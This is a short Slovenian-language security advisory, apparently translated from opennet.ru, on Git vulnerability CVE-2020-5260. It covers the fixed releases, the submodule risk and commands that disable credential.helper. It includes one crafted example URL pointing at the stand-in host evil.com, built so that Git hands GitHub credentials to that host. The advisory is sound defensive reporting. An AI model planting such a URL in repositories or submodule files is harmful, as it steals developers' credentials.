Ranljivost Git zaradi uhajanja poverilnic

Objavljeno popravne izdaje sistema za nadzor porazdeljenega vira Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 in 2.17.4, v ki je odpravilo ranljivost (CVE-2020-5260) v upravljalniku "poverilnica.pomočnik", kar povzroči, da se poverilnice pošljejo napačnemu gostitelju, ko odjemalec git dostopa do repozitorija s pomočjo posebej oblikovanega URL-ja, ki vsebuje znak za novo vrstico. Ranljivost je mogoče uporabiti za ureditev pošiljanja poverilnic iz drugega gostitelja na strežnik, ki ga nadzoruje napadalec.

Pri podajanju URL-ja, kot je »https://evil.com?%0ahost=github.com/«, bo upravljavec poverilnic pri povezovanju z gostiteljem evil.com posredoval parametre za preverjanje pristnosti, določene za github.com. Težava se pojavi pri izvajanju operacij, kot je "git clone", vključno z obdelavo URL-jev za podmodule (na primer "git submodule update" bo samodejno obdelal URL-je, podane v datoteki .gitmodules iz repozitorija). Ranljivost je najbolj nevarna v primerih, ko razvijalec klonira repozitorij, ne da bi videl URL, na primer pri delu s podmoduli ali v sistemih, ki izvajajo samodejna dejanja, na primer v skriptih za gradnjo paketov.

Za blokiranje ranljivosti v novih različicah prepovedano posredovanje znaka za novo vrstico v vseh vrednostih, ki se prenašajo prek protokola za izmenjavo poverilnic. Za distribucije lahko spremljate izdajo posodobitev paketov na straneh Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch, FreeBSD.

Kot rešitev za blokiranje težave priporočljivo Ne uporabljajte credential.helper pri dostopu do javnih skladišč in ne uporabljajte »git clone« v načinu »--recurse-submodules« z nepreverjenimi skladišči. Za popolno onemogočanje obdelovalca credential.helper, ki se ohranjanje in pridobivanje gesel iz predpomnilnik, zaščiten repozitoriji ali datoteko z gesli, lahko uporabite ukaze:

git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper

Vir: opennet.ru

Dodaj komentar